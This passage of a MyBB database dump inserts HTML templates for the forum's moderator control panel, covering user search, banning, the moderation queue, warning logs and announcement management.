class=\"textbox\" /></td> </tr> <tr> <td class=\"trow1\" width=\"25%\"><strong>{$lang->sort_by}</strong></td> <td class=\"trow1\" width=\"75%\"> <select name=\"sortby\"> <option value=\"username\"{$sortbysel[\'username\']}>{$lang->username}</option> <option value=\"regdate\"{$sortbysel[\'regdate\']}>{$lang->regdate}</option> <option value=\"lastvisit\"{$sortbysel[\'lastvisit\']}>{$lang->lastvisit}</option> <option value=\"postnum\"{$sortbysel[\'postnum\']}>{$lang->postnum}</option> </select> {$lang->in} <select name=\"order\"> <option value=\"asc\"{$ordersel[\'asc\']}>{$lang->asc}</option> <option value=\"desc\"{$ordersel[\'desc\']}>{$lang->desc}</option> </select> {$lang->order} </td> </tr> </table> <br /> <div align=\"center\"> <input type=\"submit\" class=\"button\" value=\"{$lang->find_users}\" /> </div> </td> </tr> </table> </form> {$footer} <script type=\"text/javascript\" src=\"jscripts/autocomplete.js?ver=1400\"></script> <script type=\"text/javascript\"> <!-- if(use_xmlhttprequest == \"1\") { new autoComplete(\"username\", \"xmlhttp.php?action=get_users\", {valueSpan: \"username\"}); } // --> </script> </body> </html>', '-2', '1405', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('543', 'modcp_finduser_user', ' <tr> <td class=\"{$alt_row}\"><a href=\"modcp.php?action=editprofile&amp;uid={$user[\'uid\']}\">{$user[\'username\']}</a></td> <td class=\"{$alt_row}\" align=\"center\">{$usergroup}</td> <td class=\"{$alt_row}\" align=\"center\">{$regdate}, {$regtime}</td> <td class=\"{$alt_row}\" align=\"center\">{$lastdate}, {$lasttime}</td> <td class=\"{$alt_row}\" align=\"center\">{$user[\'postnum\']}</td> </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('544', 'modcp_finduser_noresults', ' <tr> <td class=\"trow1\" align=\"center\" colspan=\"5\">{$lang->no_user_results}</td> </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('545', 'modcp_banning', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->ban_banned}</title> {$headerinclude} </head> <body> {$header} <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$modcp_nav} <td valign=\"top\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"4\"> <div class=\"float_right\"><a href=\"modcp.php?action=banuser\">{$lang->ban_user}</a></div> <strong>{$lang->ban_banned}</strong></td> </tr> <tr> <td class=\"tcat\" width=\"25%\"><span class=\"smalltext\"><strong>{$lang->username}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"30%\"><span class=\"smalltext\"><strong>{$lang->reason}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"25%\"><span class=\"smalltext\"><strong>{$lang->ban_length}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"20%\"><span class=\"smalltext\"><strong>{$lang->ban_bannedby}</strong></span></td> </tr> {$bannedusers} </table> {$multipage} </td> </tr> </table> {$footer} </body> </html>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('546', 'modcp_banuser', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->ban_user}</title> {$headerinclude} </head> <body> {$header} <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$modcp_nav} <td valign=\"top\"> {$errors} <form action=\"modcp.php\" method=\"post\"> <input type=\"hidden\" name=\"action\" value=\"do_banuser\" /> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <input type=\"hidden\" name=\"uid\" value=\"{$uid}\" /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"> {$lift_link} <strong>{$lang->ban_user}</strong> </td> </tr> {$banuser_username} <tr> <td class=\"trow2\" width=\"25%\"><strong>{$lang->ban_reason}</strong></td> <td class=\"trow2\" width=\"75%\"><input type=\"text\" class=\"textbox\" name=\"banreason\" value=\"{$banreason}\" size=\"25\" /></td> </tr> <tr> <td class=\"trow1\" width=\"25%\"><strong>{$lang->ban_movegroup}</strong></td> <td class=\"trow1\" width=\"75%\"><select name=\"usergroup\">{$bangroups}</select> </td> </tr> <tr> <td class=\"trow2\" width=\"25%\"><strong>{$lang->ban_liftafter}</strong></td> <td class=\"trow2\" width=\"75%\"><select name=\"liftafter\">{$liftlist}</select></td> </tr> </table> <br /> <div align=\"center\"> <input type=\"submit\" class=\"button\" name=\"updateban\" value=\"{$lang->ban}\" /> </div> </form> </td> </tr> </table> {$footer} <script type=\"text/javascript\" src=\"jscripts/autocomplete.js?ver=1400\"></script> <script type=\"text/javascript\"> <!-- if(use_xmlhttprequest == \"1\") { new autoComplete(\"username\", \"xmlhttp.php?action=get_users\", {valueSpan: \"username\"}); } // --> </script> </body> </html>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('547', 'modcp_banuser_addusername', '<tr> <td class=\"trow1\" width=\"25%\"><strong>{$lang->ban_username}</strong></td> <td class=\"trow1\" width=\"75%\"><input type=\"text\" class=\"textbox\" name=\"username\" id=\"username\" value=\"{$username}\" size=\"25\" /></td> </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('548', 'modcp_banuser_editusername', '<tr> <td class=\"trow1\" width=\"25%\"><strong>{$lang->ban_username}</strong></td> <td class=\"trow1\" width=\"75%\">{$username}</td> </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('549', 'modcp_banning_ban', '<tr> <td class=\"{$trow}\">{$profile_link}{$edit_link}</td> <td class=\"{$trow}\" align=\"center\">{$banned[\'reason\']}</td> <td class=\"{$trow}\" align=\"center\">{$banlength}<br /><span class=\"smalltext\">{$timeremaining}</span></td> <td class=\"{$trow}\" align=\"center\">{$admin_profile}</td> </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('550', 'modcp_banning_nobanned', '<tr> <td class=\"trow1\" align=\"center\" colspan=\"4\">{$lang->no_banned}</td> </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('551', 'modcp_modqueue_empty', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->mod_queue}</title> {$headerinclude} </head> <body> {$header} <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$modcp_nav} <td valign=\"top\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\"><strong>{$lang->mod_queue}</strong></td> </tr> <tr> <td class=\"trow1\" align=\"center\">{$lang->mod_queue_empty}</td> </tr> </table> </td> </tr> </table> {$footer} </body> </html>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('552', 'modcp_modqueue_masscontrols', '<ul class=\"modqueue_mass\"> <li><a href=\"#\" class=\"mass_ignore\" onclick=\"$$(\'input.radio_ignore\').each(function(e) { e.checked = true; }); return false;\">{$lang->mark_all_ignored}</a></li> <li><a href=\"#\" class=\"mass_delete\" onclick=\"$$(\'input.radio_delete\').each(function(e) { e.checked = true; }); return false;\">{$lang->mark_all_deletion}</a></li> <li><a href=\"#\" class=\"mass_approve\" onclick=\"$$(\'input.radio_approve\').each(function(e) { e.checked = true; }); return false;\">{$lang->mark_all_approved}</a></li> </ul>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('553', 'modcp_modqueue_threads_empty', '<tr> <td class=\"trow1\" align=\"center\" colspan=\"3\">{$lang->mod_queue_threads_empty}</td> </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('554', 'modcp_modqueue_posts_empty', '<tr> <td class=\"trow1\" align=\"center\" colspan=\"3\">{$lang->mod_queue_posts_empty}</td> </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('555', 'modcp_modqueue_attachments_empty', '<tr> <td class=\"trow1\" align=\"center\" colspan=\"6\">{$lang->mod_queue_attachments_empty}</td> </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('556', 'modcp_lastattachment', '<span class=\"smalltext\"> <a href=\"{$attachment[\'link\']}#pid{$attachment[\'pid\']}\"><strong>{$attachment[\'filename\']}</strong></a> <br />{$attachment[\'date\']} {$attachment[\'time\']}<br />{$lang->by} {$attachment[\'profilelink\']}</span> ', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('557', 'modcp_lastthread', '<span class=\"smalltext\"> <a href=\"{$thread[\'link\']}\" title=\"{$thread[\'fullsubject\']}\"><strong>{$thread[\'subject\']}</strong></a> <br />{$thread[\'date\']} {$thread[\'time\']}<br />{$lang->by} {$thread[\'profilelink\']}</span> ', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('558', 'modcp_lastpost', '<span class=\"smalltext\"> <a href=\"{$post[\'link\']}#pid{$post[\'pid\']}\" title=\"{$post[\'fullsubject\']}\"><strong>{$post[\'subject\']}</strong></a> <br />{$post[\'date\']} {$post[\'time\']}<br />{$lang->by} {$post[\'profilelink\']}</span> ', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('559', 'modcp_warninglogs', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->warning_logs}</title> {$headerinclude} </head> <body> {$header} <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$modcp_nav} <td valign=\"top\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"6\"><strong>{$lang->warning_logs}</strong></td> </tr> <tr> <td class=\"tcat\" width=\"15%\"><strong>{$lang->warned_user}</strong></td> <td class=\"tcat\" width=\"25%\"><strong>{$lang->warning}</strong></td> <td class=\"tcat\" width=\"20%\" align=\"center\"><strong>{$lang->date_issued}</strong></td> <td class=\"tcat\" width=\"20%\" align=\"center\"><strong>{$lang->expires}</strong></td> <td class=\"tcat\" width=\"15%\"><strong>{$lang->issued_by}</strong></td> <td class=\"tcat\" width=\"1%\" align=\"center\"><strong>{$lang->details}</strong></td> </tr> {$warning_list} </table> {$multipage} <br /> <form action=\"modcp.php\" method=\"get\"> <input type=\"hidden\" name=\"action\" value=\"warninglogs\" /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->filter_warning_logs}</strong></td> </tr> <tr> <td class=\"trow1\" width=\"25%\"><strong>{$lang->filter_warned_user}</strong></td> <td class=\"trow1\" width=\"75%\"><input type=\"text\" name=\"filter[username]\" id=\"username\" value=\"{$mybb->input[\'filter\'][\'username\']}\" class=\"textbox\" /></td> </tr> <tr> <td class=\"trow2\" width=\"25%\"><strong>{$lang->filter_issued_by}</strong></td> <td class=\"trow2\" width=\"75%\"><input type=\"text\" name=\"filter[mod_username]\" value=\"{$mybb->input[\'filter\'][\'mod_username\']}\" class=\"textbox\" /></td> </tr> <tr> <td class=\"trow1\" width=\"25%\"><strong>{$lang->filter_reason}</strong></td> <td class=\"trow1\" width=\"75%\"><input type=\"text\" name=\"filter[reason]\" value=\"{$mybb->input[\'filter\'][\'reason\']}\" class=\"textbox\" /></td> </tr> <tr> <td class=\"trow2\" width=\"25%\"><strong>{$lang->sort_by}</strong></td> <td class=\"trow2\" width=\"75%\"> <select name=\"filter[sortby]\"> <option value=\"username\"{$sortbysel[\'username\']}>{$lang->username}</option> <option value=\"issuedby\"{$sortbysel[\'issuedby\']}>{$lang->issued_by}</option> <option value=\"dateline\"{$sortbysel[\'dateline\']}>{$lang->issued_date}</option> <option value=\"expires\"{$sortbysel[\'expires\']}>{$lang->expiry_date}</option> </select> {$lang->in} <select name=\"filter[order]\"> <option value=\"asc\"{$ordersel[\'asc\']}>{$lang->asc}</option> <option value=\"desc\"{$ordersel[\'desc\']}>{$lang->desc}</option> </select> {$lang->order} </td> </tr> <tr> <td class=\"trow1\" width=\"25%\"><strong>{$lang->per_page}</strong></td> <td class=\"trow1\" width=\"75%\"><input type=\"text\" name=\"filter[per_page]\" value=\"{$per_page}\" class=\"textbox\" /></td> </tr> </table> <br /> <div align=\"center\"> <input type=\"submit\" class=\"button\" value=\"{$lang->filter_warning_logs}\" /> </div> </form> </td> </tr> </table> {$footer} <script type=\"text/javascript\" src=\"jscripts/autocomplete.js?ver=1400\"></script> <script type=\"text/javascript\"> <!-- if(use_xmlhttprequest == \"1\") { new autoComplete(\"username\", \"xmlhttp.php?action=get_users\", {valueSpan: \"username\"}); } // --> </script> </body> </html>', '-2', '1405', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('560', 'modcp_warninglogs_nologs', ' <tr> <td class=\"trow1\" colspan=\"6\">{$lang->no_warning_logs}</td> </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('561', 'modcp_warninglogs_warning', ' <tr> <td class=\"{$trow}\">{$username_link}</td> <td class=\"{$trow}\">{$title} ({$points})</td> <td class=\"{$trow}\" align=\"center\">{$issued_date}</td> <td class=\"{$trow}\" align=\"center\">{$expire_date}{$revoked_text}</td> <td class=\"{$trow}\">{$mod_username_link}</td> <td class=\"{$trow}\" align=\"center\"><a href=\"warnings.php?action=view&amp;wid={$row[\'wid\']}\">{$lang->view}</a></td> </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('562', 'modcp_warninglogs_warning_revoked', '<br /><span class=\"smalltext\"><strong>{$lang->revoked}</strong> {$revoked_date}</span>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('563', 'modcp_announcements_forum', ' <tr> <td class=\"{$trow}\"><div style=\"padding-left: {$padding}px;\"><strong>{$forum[\'name\']}</strong></div></td> <td class=\"{$trow}\" colspan=\"2\" align=\"center\"><a href=\"modcp.php?action=new_announcement&amp;fid={$forum[\'fid\']}\">{$lang->add_announcement}</a></td> </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('564', 'modcp_announcements_forum_nomod', ' <tr> <td class=\"{$trow}\"><div style=\"padding-left: {$padding}px;\"><strong>{$forum[\'name\']}</strong></div></td> <td class=\"{$trow}\" colspan=\"2\" align=\"center\">&nbsp;</td> </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('565', 'modcp_announcements_announcement', ' <tr> <td class=\"{$trow}\"><div style=\"padding-left: {$padding}px;\">{$icon}<a href=\"modcp.php?action=edit_announcement&amp;aid={$aid}\">{$subject}</a></div></td> <td class=\"{$trow}\" align=\"center\"><a href=\"modcp.php?action=edit_announcement&amp;aid={$aid}\">{$lang->edit}</a></td> <td class=\"{$trow}\" align=\"center\"><a href=\"modcp.php?action=delete_announcement&amp;aid={$aid}\">{$lang->delete}</a></td> </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('566', 'modcp_no_announcements_forum', ' <tr> <td class=\"trow1\" colspan=\"3\">{$lang->no_forum_announcements}</td> </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('567', 'modcp_no_announcements_global', ' <tr> <td class=\"trow1\" colspan=\"3\">{$lang->no_global_announcements}</td> </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('568', 'modcp_announcements_announcement_global', ' <tr> <td class=\"{$trow}\">{$icon}<a href=\"modcp.php?action=edit_announcement&amp;aid={$aid}\">{$subject}</a></td> <td class=\"{$trow}\" align=\"center\"><a href=\"modcp.php?action=edit_announcement&amp;aid={$aid}\">{$lang->edit}</a></td> <td class=\"{$trow}\" align=\"center\"><a href=\"modcp.php?action=delete_announcement&amp;aid={$aid}\">{$lang->delete}</a></td> </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('569', 'modcp_announcements_global', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"3\"><div class=\"float_right\"><a href=\"modcp.php?action=new_announcement&amp;fid=-1\">{$lang->add_global_announcement}</a></div><strong>{$lang->global_announcements}</strong></td> </tr> <tr> <td class=\"tcat\"><strong>{$lang->announcement}</strong></td> <td class=\"tcat\" width=\"200\" colspan=\"2\" align=\"center\"><strong>{$lang->controls}</strong></td> </tr> {$announcements_global} </table> <br />', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('570', 'modcp_announcements', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->manage_announcement}</title> {$headerinclude} </head> <body> {$header} <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$modcp_nav} <td valign=\"top\"> {$announcements_global} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"3\"><strong>{$lang->forum_announcements}</strong></td> </tr> <tr> <td class=\"tcat\"><strong>{$lang->announcement}</strong></td> <td class=\"tcat\" width=\"200\" colspan=\"2\" align=\"center\"><strong>{$lang->controls}</strong></td> </tr> {$announcements_forum} </table> </td> </tr> </table> {$footer} </body> </html>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('571', 'modcp_announcements_new', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->manage_announcement}</title> {$headerinclude} </head> <body> {$header} <form action=\"modcp.php\" method=\"post\" enctype=\"multipart/form-data\"> <input type=\"hidden\" name=\"action\" value=\"do_new_announcement\" /> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <input type=\"hidden\" name=\"fid\" value=\"{$announcement_fid}\" /> <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$modcp_nav} <td valign=\"top\"> {$errors} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"6\"><strong>{$lang->add_announcement}</strong></td> </tr> <tr> <td class=\"trow1\" valign=\"top\" width=\"25%\"><strong>{$lang->title}</strong></td> <td class=\"trow1\" valign=\"top\" width=\"75%\"><input type=\"text\" class=\"textbox\" name=\"title\" size=\"40\" value=\"{$title}\" /></td> </tr> <tr> <td class=\"trow1\" colspan=\"1\" valign=\"top\" width=\"25%\"><strong>{$lang->start_date}</strong></td> <td class=\"trow1\" valign=\"top\" width=\"75%\"> <select name=\"starttime_day\"> {$startdateday} </select> &nbsp; <select name=\"starttime_month\"> {$startdatemonth} </select> &nbsp; <input type=\"text\" name=\"starttime_year\" value=\"{$startdateyear}\" size=\"4\" maxlength=\"4\"/> - {$lang->time} <input type=\"text\" name=\"starttime_time\" value=\"{$starttime_time}\" size=\"10\" /> </td> </tr> <tr> <td class=\"trow1\" colspan=\"1\" valign=\"top\" width=\"25%\"><strong>{$lang->end_date}</strong></td> <td class=\"trow1\" valign=\"top\" width=\"75%\"> <input type=\"radio\" name=\"endtime_type\" value=\"1\"{$end_type_sel[\'finite\']} /> <select name=\"endtime_day\"> {$enddateday} </select> &nbsp; <select name=\"endtime_month\"> {$enddatemonth} </select> &nbsp; <input type=\"text\" name=\"endtime_year\" value=\"{$enddateyear}\" size=\"4\" maxlength=\"4\"/> - {$lang->time} <input type=\"text\" name=\"endtime_time\" value=\"{$endtime_time}\" size=\"10\" /> <br /><input type=\"radio\" name=\"endtime_type\" value=\"2\"{$end_type_sel[\'infinite\']} /> {$lang->never} </td> </tr> <tr> <td class=\"trow1\" valign=\"top\" width=\"25%\"><strong>{$lang->announcement}</strong><br />{$smilieinserter}</td> <td class=\"trow1\" valign=\"top\" width=\"75%\"><textarea id=\"message\" name=\"message\" rows=\"20\" cols=\"70\">{$message}</textarea>{$codebuttons}</td> </tr> <tr> <td class=\"trow1\" valign=\"top\" width=\"25%\"><strong>{$lang->allow_html}</strong></td> <td class=\"trow1\" valign=\"top\" width=\"75%\"><label><input type=\"radio\" name=\"allowhtml\" value=\"1\"{$html_sel[\'yes\']} />&nbsp;{$lang->yes}</label> &nbsp;&nbsp;<label><input type=\"radio\" name=\"allowhtml\" value=\"0\"{$html_sel[\'no\']} />&nbsp;{$lang->no}</label></td> </tr> <tr> <td class=\"trow1\" valign=\"top\" width=\"25%\"><strong>{$lang->allow_mycode}</strong></td> <td class=\"trow1\" valign=\"top\" width=\"75%\"><label><input type=\"radio\" name=\"allowmycode\" value=\"1\"{$mycode_sel[\'yes\']} />&nbsp;{$lang->yes}</label> &nbsp;&nbsp;<label><input type=\"radio\" name=\"allowmycode\" value=\"0\"{$mycode_sel[\'no\']} />&nbsp;{$lang->no}</label></td> </tr> <tr> <td class=\"trow1\" valign=\"top\" width=\"25%\"><strong>{$lang->allow_smilies}</strong></td> <td class=\"trow1\" valign=\"top\" width=\"75%\"><label><input type=\"radio\" name=\"allowsmilies\" value=\"1\"{$smilies_sel[\'yes\']} />&nbsp;{$lang->yes}</label> &nbsp;&nbsp;<label><input type=\"radio\" name=\"allowsmilies\" value=\"0\"{$smilies_sel[\'no\']} />&nbsp;{$lang->no}</label></td> </tr> </table> <br /> <div align=\"center\"> <input type=\"submit\" class=\"button\" name=\"Add Announcement\" value=\"{$lang->add_announcement}\" />&nbsp;&nbsp; <input type=\"reset\" class=\"button\" name=\"Reset\" value=\"{$lang->reset}\" /> </div> </td> </tr> </table> </form> {$footer} </body> </html>', '-2', '1405', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('572', 'modcp_announcements_edit', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->manage_announcement}</title> {$headerinclude} </head> <body> {$header} <form action=\"modcp.php\" method=\"post\" enctype=\"multipart/form-data\"> <input type=\"hidden\" name=\"action\" value=\"do_edit_announcement\" /> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <input type=\"hidden\" name=\"fid\" value=\"{$announcement[\'fid\']}\" /> <input type=\"hidden\" name=\"aid\" value=\"{$aid}\" /> <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$modcp_nav} <td valign=\"top\"> {$errors} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"6\"><strong>{$lang->edit_announcement}</strong></td> </tr> <tr> <td class=\"trow1\" valign=\"top\" width=\"25%\"><strong>{$lang->title}</strong></td> <td class=\"trow1\" valign=\"top\" width=\"75%\"><input type=\"text\" class=\"textbox\" name=\"title\" size=\"40\" value=\"{$title}\" /></td> </tr> <tr> <td class=\"trow1\" colspan=\"1\" valign=\"top\" width=\"25%\"><strong>{$lang->start_date}</strong></td> <td class=\"trow1\" valign=\"top\" width=\"75%\"> <select name=\"starttime_day\"> {$startdateday} </select> &nbsp; <select name=\"starttime_month\"> {$startdatemonth} </select> &nbsp; <input type=\"text\" name=\"starttime_year\" value=\"{$startdateyear}\" size=\"4\" maxlength=\"4\"/> - {$lang->time} <input type=\"text\" name=\"starttime_time\" value=\"{$starttime_time}\" size=\"10\" /> </td> </tr> <tr> <td class=\"trow1\" colspan=\"1\" valign=\"top\" width=\"25%\"><strong>{$lang->end_date}</strong></td> <td class=\"trow1\" valign=\"top\" width=\"75%\"> <input type=\"radio\" name=\"endtime_type\" value=\"1\"{$end_type_sel[\'finite\']} /> <select name=\"endtime_day\"> {$enddateday} </select> &nbsp; <select name=\"endtime_month\"> {$enddatemonth} </select> &nbsp; <input type=\"text\" name=\"endtime_year\" value=\"{$enddateyear}\" size=\"4\" maxlength=\"4\"/> - {$lang->time} <input type=\"text\" name=\"endtime_time\" value=\"{$endtime_time}\" size=\"10\" /> <br /><input type=\"radio\" name=\"endtime_type\" value=\"2\"{$end_type_sel[\'infinite\']} /> {$lang->never} </td> </tr> <tr> <td class=\"trow1\" valign=\"top\" width=\"25%\"><strong>{$lang->announcement}</strong><br />{$smilieinserter}</td> <td class=\"trow1\" valign=\"top\" width=\"75%\"><textarea id=\"message\" name=\"message\" rows=\"20\" cols=\"70\">{$message}</textarea>{$codebuttons}</td> </tr> <tr> <td class=\"trow1\" valign=\"top\" width=\"25%\"><strong>{$lang->allow_html}</strong></td> <td class=\"trow1\" valign=\"top\" width=\"75%\"><label><input type=\"radio\" name=\"allowhtml\" value=\"1\"{$html_sel[\'yes\']} />&nbsp;{$lang->yes}</label> &nbsp;&nbsp;<label><input type=\"radio\" name=\"allowhtml\" value=\"0\"{$html_sel[\'no\']} />&nbsp;{$lang->no}</label></td> </tr> <tr> <td class=\"trow1\" valign=\"top\" width=\"25%\"><strong>{$lang->allow_mycode}</strong></td> <td class=\"trow1\" valign=\"top\" width=\"75%\"><label><input type=\"radio\" name=\"allowmycode\" value=\"1\"{$mycode_sel[\'yes\']} />&nbsp;{$lang->yes}</label> &nbsp;&nbsp;<label><input type=\"radio\" name=\"allowmycode\" value=\"0\"{$mycode_sel[\'no\']} />&nbsp;{$lang->no}</label></td> </tr> <tr> <td class=\"trow1\" valign=\"top\" width=\"25%\"><strong>{$lang->allow_smilies}</strong></td> <td class=\"trow1\" valign=\"top\" width=\"75%\"><label><input type=\"radio\" name=\"allowsmilies\" value=\"1\"{$smilies_sel[\'yes\']} />&nbsp;{$lang->yes}</label> &nbsp;&nbsp;<label><input type=\"radio\" name=\"allowsmilies\" value=\"0\"{$smilies_sel[\'no\']} />&nbsp;{$lang->no}</label></td> </tr> </table> <br /> <div align=\"center\"> <input type=\"submit\" class=\"button\" name=\"Edit Announcement\" value=\"{$lang->edit_announcement}\" />&nbsp;&nbsp; <input type=\"reset\" class=\"button\" name=\"Reset\" value=\"{$lang->reset}\" /> </div> </td> </tr> </table> </form> {$footer} </body> </html>', '-2', '1405', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('573', 'modcp_announcements_delete', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->delete_announcement}</title> {$headerinclude} </head> <body> {$header} <form action=\"modcp.php\" method=\"post\" enctype=\"multipart/form-data\"> <input type=\"hidden\" name=\"action\" value=\"do_delete_announcement\" /> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <input type=\"hidden\" name=\"fid\" value=\"{$announcement_fid}\" /> <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$modcp_nav} <td valign=\"top\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$announcement[\'subject\']} - {$lang->delete_announcement}</strong></td> </tr> <tr> <td class=\"trow1\" colspan=\"2\" align=\"center\">{$lang->confirm_delete_announcement}</td> </tr> </table> <br /> <div align=\"center\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->delete_announcement}\" /></div> <input type=\"hidden\" name=\"aid\" value=\"{$aid}\" /> </form> </td> </tr> </table> </form> {$footer} </body> </html>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('574', 'search_orderarrow', '<span class=\"smalltext\">[<a href=\"{$sorturl}&amp;sortby={$sortby}&amp;order={$oppsortnext}\">{$oppsort}</a>]</span>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('575', 'search_results_posts_inlinecheck', '<td 